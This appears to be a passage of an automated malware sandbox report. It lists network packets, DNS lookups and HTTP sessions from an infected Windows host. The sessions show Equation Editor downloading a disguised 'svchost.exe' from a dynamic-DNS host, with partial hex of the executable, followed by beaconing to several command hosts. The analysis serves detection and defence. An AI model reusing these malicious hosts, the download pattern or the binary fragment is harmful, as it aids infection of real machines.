Apr 12, 2021 07:47:46.376401901 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:46.376633883 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:46.376645088 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:46.376822948 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:46.376863956 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:46.376868963 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:46.376910925 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:46.376954079 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:46.376988888 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:46.376991987 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:46.376992941 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:46.376996040 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:46.377032042 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:46.377227068 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:46.377475977 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:46.378159046 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:46.378202915 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:46.378310919 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:46.378354073 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:46.378395081 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:46.378407001 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:46.378410101 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:46.378490925 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:46.378573895 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:46.378659964 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:46.378705025 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:46.378765106 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:46.378846884 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:46.378886938 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:46.378895998 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:46.379204035 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:46.379249096 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:46.379399061 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:46.379436970 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:46.379483938 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:46.379522085 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:46.379528046 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:46.379529953 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:46.379580021 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:46.379621983 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:46.379657030 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:46.379692078 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:46.379695892 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:46.379698038 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:46.379705906 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:46.379748106 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:46.379785061 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:46.379818916 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:46.379823923 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:46.379823923 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:46.379827023 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:46.379863024 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:46.379895926 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:46.379899025 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:46.379900932 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:46.379940987 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:46.379975080 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:46.379980087 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:46.380044937 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:46.380085945 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:46.380125046 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:46.380157948 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:46.380161047 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:46.380162954 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:46.380163908 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:46.380202055 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:46.380244017 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:46.380295992 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:46.380297899 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:46.380301952 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:46.380304098 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:46.380748987 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:51.207026005 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:51.207145929 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:51.207160950 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:51.207174063 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:51.207192898 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:51.207298040 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:51.207308054 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:52.338047028 CEST	49173	80	192.168.2.22	74.125.143.82
Apr 12, 2021 07:47:52.385744095 CEST	80	49173	74.125.143.82	192.168.2.22
Apr 12, 2021 07:47:52.386745930 CEST	49173	80	192.168.2.22	74.125.143.82
Apr 12, 2021 07:47:52.387564898 CEST	49173	80	192.168.2.22	74.125.143.82
Apr 12, 2021 07:47:52.435030937 CEST	80	49173	74.125.143.82	192.168.2.22
Apr 12, 2021 07:47:52.435070992 CEST	80	49173	74.125.143.82	192.168.2.22
Apr 12, 2021 07:47:52.435089111 CEST	80	49173	74.125.143.82	192.168.2.22
Apr 12, 2021 07:47:52.435208082 CEST	49173	80	192.168.2.22	74.125.143.82
Apr 12, 2021 07:47:52.435663939 CEST	49173	80	192.168.2.22	74.125.143.82
Apr 12, 2021 07:47:52.435703039 CEST	49173	80	192.168.2.22	74.125.143.82
Apr 12, 2021 07:47:52.483156919 CEST	80	49173	74.125.143.82	192.168.2.22
Apr 12, 2021 07:47:52.483300924 CEST	49173	80	192.168.2.22	74.125.143.82
Apr 12, 2021 07:47:54.261297941 CEST	49174	80	192.168.2.22	74.125.143.82
Apr 12, 2021 07:47:54.309252024 CEST	80	49174	74.125.143.82	192.168.2.22
Apr 12, 2021 07:47:54.309336901 CEST	49174	80	192.168.2.22	74.125.143.82
Apr 12, 2021 07:47:54.309803009 CEST	49174	80	192.168.2.22	74.125.143.82
Apr 12, 2021 07:47:54.357330084 CEST	80	49174	74.125.143.82	192.168.2.22
Apr 12, 2021 07:47:54.357358932 CEST	80	49174	74.125.143.82	192.168.2.22
Apr 12, 2021 07:47:54.357371092 CEST	80	49174	74.125.143.82	192.168.2.22
Apr 12, 2021 07:47:54.357444048 CEST	49174	80	192.168.2.22	74.125.143.82
Apr 12, 2021 07:48:03.318557024 CEST	49174	80	192.168.2.22	74.125.143.82
Apr 12, 2021 07:48:04.477405071 CEST	49172	443	192.168.2.22	103.67.236.191

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 12, 2021 07:47:18.195986032 CEST	52197	53	192.168.2.22	8.8.8.8
Apr 12, 2021 07:47:18.257677078 CEST	53	52197	8.8.8.8	192.168.2.22
Apr 12, 2021 07:47:18.258025885 CEST	52197	53	192.168.2.22	8.8.8.8
Apr 12, 2021 07:47:18.315959930 CEST	53	52197	8.8.8.8	192.168.2.22
Apr 12, 2021 07:47:18.751626968 CEST	53099	53	192.168.2.22	8.8.8.8
Apr 12, 2021 07:47:18.800386906 CEST	53	53099	8.8.8.8	192.168.2.22
Apr 12, 2021 07:47:18.800673008 CEST	53099	53	192.168.2.22	8.8.8.8
Apr 12, 2021 07:47:18.849329948 CEST	53	53099	8.8.8.8	192.168.2.22
Apr 12, 2021 07:47:18.865688086 CEST	52838	53	192.168.2.22	8.8.8.8
Apr 12, 2021 07:47:18.917309046 CEST	53	52838	8.8.8.8	192.168.2.22
Apr 12, 2021 07:47:18.917541981 CEST	52838	53	192.168.2.22	8.8.8.8
Apr 12, 2021 07:47:18.969111919 CEST	53	52838	8.8.8.8	192.168.2.22
Apr 12, 2021 07:47:19.511912107 CEST	61200	53	192.168.2.22	8.8.8.8
Apr 12, 2021 07:47:19.580688000 CEST	53	61200	8.8.8.8	192.168.2.22
Apr 12, 2021 07:47:19.587740898 CEST	49548	53	192.168.2.22	8.8.8.8
Apr 12, 2021 07:47:19.651631117 CEST	53	49548	8.8.8.8	192.168.2.22
Apr 12, 2021 07:47:20.322611094 CEST	55627	53	192.168.2.22	8.8.8.8
Apr 12, 2021 07:47:20.392366886 CEST	53	55627	8.8.8.8	192.168.2.22
Apr 12, 2021 07:47:39.182238102 CEST	56009	53	192.168.2.22	8.8.8.8
Apr 12, 2021 07:47:39.248019934 CEST	53	56009	8.8.8.8	192.168.2.22
Apr 12, 2021 07:47:39.248718023 CEST	56009	53	192.168.2.22	8.8.8.8
Apr 12, 2021 07:47:39.307753086 CEST	53	56009	8.8.8.8	192.168.2.22
Apr 12, 2021 07:47:41.100979090 CEST	61865	53	192.168.2.22	8.8.8.8
Apr 12, 2021 07:47:41.167275906 CEST	53	61865	8.8.8.8	192.168.2.22
Apr 12, 2021 07:47:42.505069971 CEST	55171	53	192.168.2.22	8.8.8.8
Apr 12, 2021 07:47:42.516352892 CEST	52496	53	192.168.2.22	8.8.8.8
Apr 12, 2021 07:47:42.582534075 CEST	53	52496	8.8.8.8	192.168.2.22
Apr 12, 2021 07:47:42.922056913 CEST	53	55171	8.8.8.8	192.168.2.22
Apr 12, 2021 07:47:42.924905062 CEST	55171	53	192.168.2.22	8.8.8.8
Apr 12, 2021 07:47:43.347234964 CEST	53	55171	8.8.8.8	192.168.2.22
Apr 12, 2021 07:47:44.014976025 CEST	57564	53	192.168.2.22	8.8.8.8
Apr 12, 2021 07:47:44.157403946 CEST	53	57564	8.8.8.8	192.168.2.22
Apr 12, 2021 07:47:48.345712900 CEST	63009	53	192.168.2.22	8.8.8.8
Apr 12, 2021 07:47:48.530267000 CEST	53	63009	8.8.8.8	192.168.2.22
Apr 12, 2021 07:48:44.794153929 CEST	54129	53	192.168.2.22	8.8.8.8
Apr 12, 2021 07:48:44.866134882 CEST	53	54129	8.8.8.8	192.168.2.22

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Apr 12, 2021 07:47:18.195986032 CEST	192.168.2.22	8.8.8.8	0xd92d	Standard query (0)	fqe.short.gy	A (IP address)	IN (0x0001)
Apr 12, 2021 07:47:18.258025885 CEST	192.168.2.22	8.8.8.8	0xd92d	Standard query (0)	fqe.short.gy	A (IP address)	IN (0x0001)
Apr 12, 2021 07:47:20.322611094 CEST	192.168.2.22	8.8.8.8	0xa715	Standard query (0)	stdyworkfinetraingst.dns.army	A (IP address)	IN (0x0001)
Apr 12, 2021 07:47:39.182238102 CEST	192.168.2.22	8.8.8.8	0x94ee	Standard query (0)	vccmd01.googlecode.com	A (IP address)	IN (0x0001)
Apr 12, 2021 07:47:39.248718023 CEST	192.168.2.22	8.8.8.8	0x94ee	Standard query (0)	vccmd01.googlecode.com	A (IP address)	IN (0x0001)
Apr 12, 2021 07:47:41.100979090 CEST	192.168.2.22	8.8.8.8	0xbaa2	Standard query (0)	vccmd02.googlecode.com	A (IP address)	IN (0x0001)
Apr 12, 2021 07:47:42.505069971 CEST	192.168.2.22	8.8.8.8	0x852e	Standard query (0)	demo.sdssoftltd.co.uk	A (IP address)	IN (0x0001)
Apr 12, 2021 07:47:42.516352892 CEST	192.168.2.22	8.8.8.8	0xeeae	Standard query (0)	vccmd03.googlecode.com	A (IP address)	IN (0x0001)
Apr 12, 2021 07:47:42.924905062 CEST	192.168.2.22	8.8.8.8	0x852e	Standard query (0)	demo.sdssoftltd.co.uk	A (IP address)	IN (0x0001)
Apr 12, 2021 07:47:44.014976025 CEST	192.168.2.22	8.8.8.8	0x367f	Standard query (0)	vccmd01.t35.com	A (IP address)	IN (0x0001)
Apr 12, 2021 07:47:48.345712900 CEST	192.168.2.22	8.8.8.8	0xeb5	Standard query (0)	vccmd01.zxq.net	A (IP address)	IN (0x0001)
Apr 12, 2021 07:48:44.794153929 CEST	192.168.2.22	8.8.8.8	0xf157	Standard query (0)	www.chapelcouture.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Apr 12, 2021 07:47:18.257677078 CEST	8.8.8.8	192.168.2.22	0xd92d	No error (0)	fqe.short.gy		52.59.165.42	A (IP address)	IN (0x0001)
Apr 12, 2021 07:47:18.257677078 CEST	8.8.8.8	192.168.2.22	0xd92d	No error (0)	fqe.short.gy		18.184.197.212	A (IP address)	IN (0x0001)
Apr 12, 2021 07:47:18.315959930 CEST	8.8.8.8	192.168.2.22	0xd92d	No error (0)	fqe.short.gy		52.59.165.42	A (IP address)	IN (0x0001)
Apr 12, 2021 07:47:18.315959930 CEST	8.8.8.8	192.168.2.22	0xd92d	No error (0)	fqe.short.gy		18.184.197.212	A (IP address)	IN (0x0001)
Apr 12, 2021 07:47:20.392366886 CEST	8.8.8.8	192.168.2.22	0xa715	No error (0)	stdyworkfinetraingst.dns.army		103.141.138.118	A (IP address)	IN (0x0001)
Apr 12, 2021 07:47:39.248019934 CEST	8.8.8.8	192.168.2.22	0x94ee	No error (0)	vccmd01.googlecode.com	googlecode.l.googleusercontent.com		CNAME (Canonical name)	IN (0x0001)
Apr 12, 2021 07:47:39.248019934 CEST	8.8.8.8	192.168.2.22	0x94ee	No error (0)	googlecode.l.googleusercontent.com		74.125.143.82	A (IP address)	IN (0x0001)
Apr 12, 2021 07:47:39.307753086 CEST	8.8.8.8	192.168.2.22	0x94ee	No error (0)	vccmd01.googlecode.com	googlecode.l.googleusercontent.com		CNAME (Canonical name)	IN (0x0001)
Apr 12, 2021 07:47:39.307753086 CEST	8.8.8.8	192.168.2.22	0x94ee	No error (0)	googlecode.l.googleusercontent.com		74.125.143.82	A (IP address)	IN (0x0001)
Apr 12, 2021 07:47:41.167275906 CEST	8.8.8.8	192.168.2.22	0xbaa2	No error (0)	vccmd02.googlecode.com	googlecode.l.googleusercontent.com		CNAME (Canonical name)	IN (0x0001)
Apr 12, 2021 07:47:41.167275906 CEST	8.8.8.8	192.168.2.22	0xbaa2	No error (0)	googlecode.l.googleusercontent.com		74.125.143.82	A (IP address)	IN (0x0001)
Apr 12, 2021 07:47:42.582534075 CEST	8.8.8.8	192.168.2.22	0xeeae	No error (0)	vccmd03.googlecode.com	googlecode.l.googleusercontent.com		CNAME (Canonical name)	IN (0x0001)
Apr 12, 2021 07:47:42.582534075 CEST	8.8.8.8	192.168.2.22	0xeeae	No error (0)	googlecode.l.googleusercontent.com		74.125.143.82	A (IP address)	IN (0x0001)
Apr 12, 2021 07:47:42.922056913 CEST	8.8.8.8	192.168.2.22	0x852e	No error (0)	demo.sdssoftltd.co.uk		103.67.236.191	A (IP address)	IN (0x0001)
Apr 12, 2021 07:47:43.347234964 CEST	8.8.8.8	192.168.2.22	0x852e	No error (0)	demo.sdssoftltd.co.uk		103.67.236.191	A (IP address)	IN (0x0001)
Apr 12, 2021 07:47:44.157403946 CEST	8.8.8.8	192.168.2.22	0x367f	Name error (3)	vccmd01.t35.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 07:47:48.530267000 CEST	8.8.8.8	192.168.2.22	0xeb5	Name error (3)	vccmd01.zxq.net	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 07:48:44.866134882 CEST	8.8.8.8	192.168.2.22	0xf157	No error (0)	www.chapelcouture.com	chapelcouture.com		CNAME (Canonical name)	IN (0x0001)
Apr 12, 2021 07:48:44.866134882 CEST	8.8.8.8	192.168.2.22	0xf157	No error (0)	chapelcouture.com		34.102.136.180	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

stdyworkfinetraingst.dns.army

vccmd01.googlecode.com

vccmd02.googlecode.com

vccmd03.googlecode.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.22	49168	103.141.138.118	80	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Timestamp	kBytes transferred	Direction	Data
Apr 12, 2021 07:47:20.629703045 CEST	71	OUT	GET /findoc/svchost.exe HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Connection: Keep-Alive Host: stdyworkfinetraingst.dns.army
Apr 12, 2021 07:47:20.864182949 CEST	72	IN	HTTP/1.1 200 OK Date: Mon, 12 Apr 2021 05:47:19 GMT Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/8.0.0 Last-Modified: Sun, 11 Apr 2021 22:43:28 GMT ETag: "5cb48-5bfba202eca11" Accept-Ranges: bytes Content-Length: 379720 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-msdownload Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 bd 31 6d fe f9 50 03 ad f9 50 03 ad f9 50 03 ad 7a 4c 0d ad f8 50 03 ad 90 4f 0a ad f3 50 03 ad 10 4f 0e ad f8 50 03 ad 52 69 63 68 f9 50 03 ad 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 fc af f7 4d 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 b0 02 00 00 30 00 00 00 00 00 00 70 36 00 00 00 10 00 00 00 c0 02 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 f0 02 00 00 10 00 00 c8 b1 03 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 84 ac 02 00 28 00 00 00 00 e0 02 00 e0 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 84 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 28 a7 02 00 00 10 00 00 00 b0 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 74 1b 00 00 00 c0 02 00 00 10 00 00 00 c0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 e0 05 00 00 00 e0 02 00 00 10 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 24 a7 91 47 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1mPPPzLPOPOPRichPPELM0p6@(( .text( `.datat@.rsrc@@$GMSVBVM60.DLL
Apr 12, 2021 07:47:20.864227057 CEST	74	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Apr 12, 2021 07:47:20.864257097 CEST	75	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Apr 12, 2021 07:47:20.864285946 CEST	76	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Apr 12, 2021 07:47:21.098994970 CEST	78	IN	Data Raw: 00 90 b8 40 00 ab b8 40 00 bd b8 40 00 ca b8 40 00 f4 b8 40 00 01 b9 40 00 21 b9 40 00 21 b9 40 00 9d b9 40 00 c7 b9 40 00 e0 b9 40 00 e5 b9 40 00 e5 b9 40 00 f2 b9 40 00 f2 b9 40 00 f2 b9 40 00 3b ba 40 00 84 ba 40 00 cd ba 40 00 43 bb 40 00 72 Data Ascii: @@@@@@!@!@@@@@@@@@;@@@C@r@@@@@@@'@8@Q@g@g@@@@@@Y@@[@g@s@@@=@=@e@@@@@@@q@@@@H@@@
Apr 12, 2021 07:47:21.099025965 CEST	79	IN	Data Raw: ee 40 00 17 ef 40 00 3a ef 40 00 47 ef 40 00 60 ef 40 00 65 ef 40 00 94 ef 40 00 51 f0 40 00 51 f0 40 00 15 f1 40 00 f3 f1 40 00 fc f2 40 00 17 f3 40 00 17 f3 40 00 17 f3 40 00 17 f3 40 00 17 f3 40 00 35 f3 40 00 41 f3 40 00 5d f3 40 00 c4 f3 40 Data Ascii: @@:@G@`@e@@Q@Q@@@@@@@@@5@A@]@@G@X@@@@@@@@@@@@@,@\@e@w@@@@@@@@@@N@N@N@c@@%@@@"
Apr 12, 2021 07:47:21.099041939 CEST	81	IN	Data Raw: 00 3c 3a 41 00 57 3a 41 00 79 3a 41 00 a7 3a 41 00 fc 3a 41 00 99 3b 41 00 ac 3b 41 00 6f 3c 41 00 eb 3c 41 00 6b 3d 41 00 eb 3d 41 00 6b 3e 41 00 7e 3e 41 00 41 3f 41 00 be 3f 41 00 3e 40 41 00 be 40 41 00 3e 41 41 00 51 41 41 00 14 42 41 00 91 Data Ascii: <:AW:Ay:A:A:A;A;Ao<A<Ak=A=Ak>A~>AA?A?A>@A@A>AAQAABABACACADA$DADAdEAEAFA4FARFAWFAWFAWFAuFAFAFAFAFAFAFAFAGA#GA(GA(GA}GAHAHApHAHAIA`IAIAJASJAsJAJAJAJAJ
Apr 12, 2021 07:47:21.099059105 CEST	82	IN	Data Raw: 00 00 00 00 00 00 00 58 23 40 00 04 00 00 00 ce 9a 41 00 d5 9a 41 00 e4 9a 41 00 fc 9a 41 00 00 00 00 00 2e 00 14 00 00 00 00 00 33 9c 41 00 16 9c 41 00 00 00 00 00 88 23 40 00 06 00 00 00 4e 9b 41 00 55 9b 41 00 64 9b 41 00 94 9b 41 00 f3 9b 41 Data Ascii: X#@AAAA.3AA#@NAUAdAAAA,A#@AAAAAAqAAApAAAAAAAmAcA 0$@AAA
Apr 12, 2021 07:47:21.099075079 CEST	83	IN	Data Raw: 00 2e 00 14 00 00 00 00 00 fb ea 41 00 de ea 41 00 00 00 00 00 a0 28 40 00 06 00 00 00 0e ea 41 00 15 ea 41 00 24 ea 41 00 41 ea 41 00 8a ea 41 00 d7 ea 41 00 00 00 00 00 36 00 14 00 00 00 00 00 2b f1 41 00 c3 f0 41 00 68 29 40 00 d8 28 40 00 21 Data Ascii: .AA(@AA$AAAAA6+AAh)@(@!^AeAtAAAAAA(A9AFAAAA3AAAA1A>A@AKAKAaAmAmAmA\|AAAAAAmA.
Apr 12, 2021 07:47:21.099091053 CEST	85	IN	Data Raw: 29 42 00 90 29 42 00 c8 29 42 00 d9 29 42 00 fd 29 42 00 18 2a 42 00 35 2a 42 00 df 2a 42 00 4e 2b 42 00 50 2b 42 00 5e 2b 42 00 5e 2b 42 00 60 2b 42 00 6e 2b 42 00 6e 2b 42 00 85 2b 42 00 00 00 00 00 00 00 00 00 26 00 14 00 00 00 00 00 17 2f 42 Data Ascii: )B)B)B)B)BB5B*BN+BP+B^+B^+B`+Bn+Bn+B+B&/B.B .@.,BA,BP,B~,B,B,B,B-B!-BJ-B[-B-B-B-Ba.B.B.B.B.B.B~PBNB.@NB@ @
Apr 12, 2021 07:47:21.099107027 CEST	86	IN	Data Raw: 11 40 00 ff 25 70 11 40 00 ff 25 58 10 40 00 ff 25 10 10 40 00 ff 25 3c 12 40 00 ff 25 0c 10 40 00 ff 25 6c 12 40 00 ff 25 a8 11 40 00 ff 25 d0 10 40 00 ff 25 54 11 40 00 ff 25 60 12 40 00 ff 25 58 12 40 00 ff 25 18 11 40 00 ff 25 f8 11 40 00 ff Data Ascii: @%p@%X@%@%<@%@%l@%@%@%T@%`@%X@%@%@%@%@%L@%h@%@%@%l@%@%@%h@%@%@%@%\@%@@%@%8@%4@%@%@%@%(@%H@%@%@%@%@

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.22	49169	74.125.143.82	80	C:\Windows\system\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Apr 12, 2021 07:47:39.370704889 CEST	473	OUT	GET /files/cmsys.gif HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Host: vccmd01.googlecode.com Connection: Keep-Alive
